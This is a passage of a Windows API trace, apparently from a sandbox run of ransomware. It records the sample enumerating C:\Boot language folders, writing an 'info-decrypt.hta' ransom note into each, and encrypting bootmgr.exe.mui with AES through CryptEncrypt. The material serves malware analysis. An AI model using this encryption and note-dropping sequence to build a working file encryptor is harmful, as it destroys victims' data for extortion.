nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.408] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0147.408] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.408] FindClose (in: hFindFile=0xb7f890 | out: hFindFile=0xb7f890) returned 1 [0147.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0147.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0147.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0147.408] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0147.408] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0147.408] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f890 [0147.409] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.409] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0147.409] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0147.409] FindClose (in: hFindFile=0xb7f890 | out: hFindFile=0xb7f890) returned 1 [0147.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0147.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0147.409] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0147.409] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0147.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0147.409] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta" (normalized: "c:\\boot\\de-de\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0147.410] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0147.410] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0147.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0147.410] CreateFileW (lpFileName="C:\\Boot\\de-DE\\info-decrypt.hta" (normalized: "c:\\boot\\de-de\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4b4 [0147.410] GetFileType (hFile=0x4b4) returned 0x1 [0147.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0147.410] GetFileType (hFile=0x4b4) returned 0x1 [0147.410] WriteFile (in: hFile=0x4b4, lpBuffer=0x386c24c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x386c24c*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0147.411] WriteFile (in: hFile=0x4b4, lpBuffer=0x386c24c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x386c24c*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0147.411] CloseHandle (hObject=0x4b4) returned 1 [0147.412] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0147.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0147.412] GetFileAttributesExW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x386d268 | out: lpFileInformation=0x386d268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0147.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0147.412] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0147.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0147.412] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4b4 [0147.412] GetFileType (hFile=0x4b4) returned 0x1 [0147.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0147.412] GetFileType (hFile=0x4b4) returned 0x1 [0147.412] GetFileSize (in: hFile=0x4b4, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16640 [0147.413] ReadFile (in: hFile=0x4b4, lpBuffer=0x4727848, nNumberOfBytesToRead=0x16640, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x4727848*, lpNumberOfBytesRead=0x6a7f1bc*=0x16640, lpOverlapped=0x0) returned 1 [0147.415] CloseHandle (hObject=0x4b4) returned 1 [0147.415] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbdf948) returned 1 [0147.416] CryptGenRandom (in: hProv=0xbdf948, dwLen=0x10, pbBuffer=0x386d728 | out: pbBuffer=0x386d728) returned 1 [0148.209] CryptImportKey (in: hProv=0xbdf948, pbData=0x370ede0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f050) returned 1 [0148.209] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.209] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.209] CryptDuplicateKey (in: hKey=0xb7f050, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f290) returned 1 [0148.209] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.209] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x4, pbData=0x370eec0*=0x1, dwFlags=0x0) returned 1 [0148.209] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x1, pbData=0x370ee8c, dwFlags=0x0) returned 1 [0148.210] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4af9280*, pdwDataLen=0x6a7f188*=0x16650, dwBufLen=0x16650 | out: pbData=0x4af9280*, pdwDataLen=0x6a7f188*=0x16650) returned 1 [0148.210] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370eee8*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x370eee8*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0148.212] CryptDestroyKey (hKey=0xb7f050) returned 1 [0148.212] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0148.212] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0148.212] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0148.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0148.212] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0148.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0148.214] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0148.214] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0148.214] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f050 [0148.214] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.214] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0148.214] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.215] FindClose (in: hFindFile=0xb7f050 | out: hFindFile=0xb7f050) returned 1 [0148.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0148.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0148.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0148.215] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR", lpFilePart=0x0) returned 0xd [0148.215] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\", lpFilePart=0x0) returned 0xe [0148.215] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f050 [0148.215] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.215] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0148.216] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0148.216] FindClose (in: hFindFile=0xb7f050 | out: hFindFile=0xb7f050) returned 1 [0148.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0148.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0148.216] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0148.216] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0148.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0148.216] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta" (normalized: "c:\\boot\\el-gr\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0148.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0148.216] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0148.216] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0148.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0148.216] CreateFileW (lpFileName="C:\\Boot\\el-GR\\info-decrypt.hta" (normalized: "c:\\boot\\el-gr\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320 [0148.217] GetFileType (hFile=0x320) returned 0x1 [0148.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0148.217] GetFileType (hFile=0x320) returned 0x1 [0148.217] WriteFile (in: hFile=0x320, lpBuffer=0x3711d60*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3711d60*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0148.218] WriteFile (in: hFile=0x320, lpBuffer=0x3711d60*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3711d60*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0148.218] CloseHandle (hObject=0x320) returned 1 [0148.219] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0148.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0148.219] GetFileAttributesExW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3712d7c | out: lpFileInformation=0x3712d7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0148.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0148.219] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0148.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0148.220] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0148.220] GetFileType (hFile=0x320) returned 0x1 [0148.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0148.220] GetFileType (hFile=0x320) returned 0x1 [0148.220] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x17250 [0148.220] ReadFile (in: hFile=0x320, lpBuffer=0x4b0f8f0, nNumberOfBytesToRead=0x17250, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x4b0f8f0*, lpNumberOfBytesRead=0x6a7f1bc*=0x17250, lpOverlapped=0x0) returned 1 [0148.376] CloseHandle (hObject=0x320) returned 1 [0148.376] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe00b8) returned 1 [0148.377] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x37135ac | out: pbBuffer=0x37135ac) returned 1 [0149.198] CryptImportKey (in: hProv=0xbe00b8, pbData=0x381d490, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fa90) returned 1 [0149.198] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.198] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.198] CryptDuplicateKey (in: hKey=0xb7fa90, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fad0) returned 1 [0149.198] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.198] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x4, pbData=0x381d570*=0x1, dwFlags=0x0) returned 1 [0149.198] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x1, pbData=0x381d53c, dwFlags=0x0) returned 1 [0149.199] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4b46650*, pdwDataLen=0x6a7f188*=0x17260, dwBufLen=0x17260 | out: pbData=0x4b46650*, pdwDataLen=0x6a7f188*=0x17260) returned 1 [0149.199] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x381d598*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x381d598*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0149.201] CryptDestroyKey (hKey=0xb7fa90) returned 1 [0149.201] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0149.201] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0149.201] GetFullPathNameW (in: lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0149.201] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0149.201] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0149.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0149.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0149.203] GetFullPathNameW (in: lpFileName="C:\\Boot\\en-US", nBufferLength=0x105, 